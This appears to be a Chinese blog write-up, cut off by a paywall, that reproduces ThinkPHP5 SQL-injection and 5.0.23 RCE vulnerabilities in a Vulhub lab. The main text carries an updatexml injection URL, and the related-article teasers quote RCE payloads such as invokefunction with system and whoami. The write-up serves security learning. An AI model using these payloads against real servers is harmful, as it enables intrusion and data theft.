Vulhub复现--ThinkPHP框架系列（一）

最新推荐文章于 2025-09-03 12:35:37 发布

原创

最新推荐文章于 2025-09-03 12:35:37 发布 · 844 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#php #web安全 #网络安全 #thinkphp #漏洞复现

文章详细介绍了ThinkPHP5框架存在的两个重大安全问题：SQL注入漏洞和5.0.23版本的远程代码执行漏洞。通过示例代码和POC，展示了攻击者如何利用这些漏洞进行恶意操作，包括信息泄露和写入webshell。同时，文章提供了漏洞的原理分析，帮助读者理解漏洞成因。

ThinkPHP5 SQL注入漏洞/信息泄露

ThinkPHP5 5.0.23 远程代码执行漏洞

ThinkPHP5 SQL注入漏洞/信息泄露

环境路径：thinkphp/in-sqlinjecttion

启动环境后，根据提示访问

http://192.168.20.158/index.php?ids[]=1$ids[]=2

Exploit

http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

另外还有敏感信息的泄露

漏洞分析

漏洞代码分析

<?php
namespace app\index\controller;
use app\index\model\User;
class Index{
    public function index()
    {
        $ids = input('ids/a');
        $t = new User();
        $result = $t->where('id', 'in', $ids)->select();
}
}

由上述代码可知，这里用助手函数input定义了参数ids的类型是数组。接着去找where(‘id’, ‘in’, $ids)定义的内容，找到了最核心的方法buildWhere 和 parseWhereItem

protecte

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

tzyyyyyy

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce

qq_51577576的博客

10-02

2911

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)

小城的博客

12-24

1212

目录thinkphp 2-rce5.0.23远程代码执行大家好，我是小城，一个刚刚起步的学渣，笨鸟先飞，可惜我领悟得太晚。但从现在开始，我会努力加油进取变强！ thinkphp 2-rce 0x01 漏洞原理 ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由： $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)

参与评论您还未登录，请先登录后发表或查看评论

Vulhub-thinkphp

Mccc_li的博客

08-09

676

文章目录ThinkPHP 2.x 任意代码执行漏洞漏洞原理 ThinkPHP 2.x 任意代码执行漏洞漏洞原理 ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由： $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。 ThinkPHP 3.0版本因为Lite

[Vulhub] ThinkPHP漏洞合集

weixin_45605352的博客

05-11

3185

0x01 复现环境攻击机：kali linux，Windows 10 x64 靶机：XXE（下载链接https://www.vulnhub.com/entry/xxe-lab-1,254/）网络设置：均为桥接模式 0x02 漏洞复现主机发现&端口扫描先确定靶机ip地址，这里用arp-scan -l命令探测内网：发现靶机地址为192.168.43.228，接下来用nmap -sV -p- 192.168.43.228 扫描一下： -sV：探测端口服务版本；-p：指定端口；-v：显示扫描过

【vulhub】thinkphp漏洞系列

最新发布

2401_86835152的博客

09-03

657

通过 get、header、cookie 等位置传入参数实现目录穿越和文件包含，从而利用 pearcmd 文件包含实现远程命令执行通过构造特定的 URL，可以实现目录穿越和文件包含，然后利用 pearcmd 文件包含实现远程命令执行。具体来说，该框架在使用preg_replace的/e模式匹配路由时，未对用户输入参数进行充分过滤，导致输入参数被直接插入双引号中执行，从而引发任意代码执行漏洞。模式进行正则匹配，用户输入的参数可能被直接注入到代码执行上下文中，导致攻击者可构造恶意输入执行任意代码。

Vulhub/thinkphp漏洞复现

qq_45230030的博客

12-28

716

vulhub靶场thinkphp漏洞复现

vulhub-thinkphp漏洞复现

qq_51922767的博客

09-14

2987

vulhub-thinkphp漏洞复现

vulhub漏洞—ThinkPHP

weixin_45808483的博客

12-02

538

/index.php?s=captcha _method=__construct&filter%5B%5D=system&method=get&server%5BREQUEST_METHOD%5D=pwd

Vulhub复现--ThinkPHP框架系列（二）

tzyyyyyy的博客

04-27

381

Vulhub靶场关于ThinkPHP框架的漏洞复现

框架漏洞-CVE复现-ThinkPHP+Laravel+Struts+Spring

xiaoheizi的博客

07-16

622

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("要执行的命令")就是别人写好包装起来的一套工具，把你原先必须要写的，必须要做的一些复杂的东西都写好了放在那里，你只要调用他的方法，就可以实现一些本来要费好大劲的功能。工具：https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP。我要执行的是反弹shell命令，需要先对命令进行编码。

【vulhub靶场之thinkphp】——（5-rce）

weixin_57240513的博客

08-07

755

docker-compose ps//查看开启的端口。

vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现（详细图解）

鱼溯的博客

02-02

2819

vulhub thinkphp漏洞复现 | in-sqliniection、2-rce、5.0.23-rce、5-rce漏洞复现（详细图解）

vulhub之thinkphp复现

weixin_47346400的博客

05-07

800

1.搭建环境。 2.利用thinkphp检测工具扫描出对应的payload，直接上 3.针对rce-5.0的payload http://192.168.2.134:8080/index.php/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 在这里插入代码片?s=/index/\think\app/invokefu

vulhub中ThinkPHP 多语言本地文件包含漏洞复现

yougexiaojiuguan的博客

03-06

691

漏洞复现的记录，

thinkPHP漏洞复现--vulhub

ccc_9wy的博客

12-09

1477

收集thinkPHP已知漏洞的复现过程，包括所有payload也在内。Thinkphp 5.x RCE；ThinkPHP 2.x RCE；ThinkPHP5 SQL注入漏洞。

【vulhub漏洞复现】Thinkphp 2.x 任意代码执行

RexHa的博客

02-28

2934

当preg_replace使用了/e模式，可以导致代码执行。该函数的正则规则和目标字符可以由用户进行输入。preg_replace 函数在匹配到符号正则的字符串时，会将替换字符（第二个参数）当做代码来执行。在ThinkPHP ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由，导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。

thinkphp系列漏洞复现(组合拳-vulhub里的)

m0_58596609的博客

01-07

1642

thinkphp系列漏洞复现(组合拳)

vulhub thinkphp几个漏洞

02-12

### ThinkPHP框架在VulHub中的漏洞信息 #### 漏洞概述 ThinkPHP是一个流行的PHP开发框架，在不同版本中存在多个安全漏洞。这些漏洞主要集中在远程代码执行(RCE)方面，给应用带来了严重的安全隐患[^1]。 #### VulHub上的ThinkPHP漏洞列表及详情 ##### 1. ThinkPHP 5.0.23 RCE漏洞此漏洞允许攻击者通过精心构造的HTTP请求来执行任意PHP代码。该漏洞影响范围广泛，涉及ThinkPHP 5.0系列直至5.0.23版本。利用方式通常涉及到`/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1`这样的URL路径。 ##### 2. ThinkPHP 3.2.x RCE漏洞针对ThinkPHP 3.2.x版本的安全问题同样不容忽视。由于控制器解析过程中存在的缺陷，使得未经身份验证的远程攻击者能够触发RCE条件。具体来说，当应用程序尝试处理含有恶意输入的数据时就会出现问题[^2]。 ##### 3. ThinkPHP 2.x 任意代码执行漏洞对于更早些时候发布的ThinkPHP 2.x版而言，也发现了类似的危险情况。特别是模块加载机制中存在的逻辑错误可以被用来实施攻击行为。例如，可以通过向服务器发送特制参数实现对系统的非法控制。 ##### 4. ThinkPHP 5.x 全版本任意代码执行分析除了上述特定版本外，整个ThinkPHP 5.x家族都受到了不同程度的影响。研究显示，从5.0到最新的稳定发行版均可能存在风险点。这主要是因为某些核心功能的设计上存在着潜在隐患，容易成为黑客的目标对象。 ##### 5. ThinkPHP5 SQL注入漏洞 && 敏感信息泄露另一个值得注意的是SQL注入以及敏感数据暴露的问题。这类事件往往发生在不当配置或编程失误的情况下，可能导致数据库内的机密资料遭到窃取甚至篡改。此外，还可能造成网站后台管理界面密码明文存储等问题的发生。 #### 使用Docker部署并测试漏洞环境的方法为了方便研究人员学习和理解这些问题的具体表现形式及其危害程度，推荐采用官方提供的vulhub项目来进行本地化搭建实验平台。操作步骤如下所示： ```bash systemctl start docker # 启动docker服务 git clone https://github.com/vulhub/vulhub.git # 获取最新源码库 cd ./vulhub/thinkphp/5-rce # 切换至对应目录下 docker-compose up -d # 构建容器镜像并运行起来 docker-compose ps # 查看当前状态下的实例进程表单 ``` 以上命令可以帮助快速建立一个用于重现已知漏洞现象的学习型虚拟主机集群环境[^4]。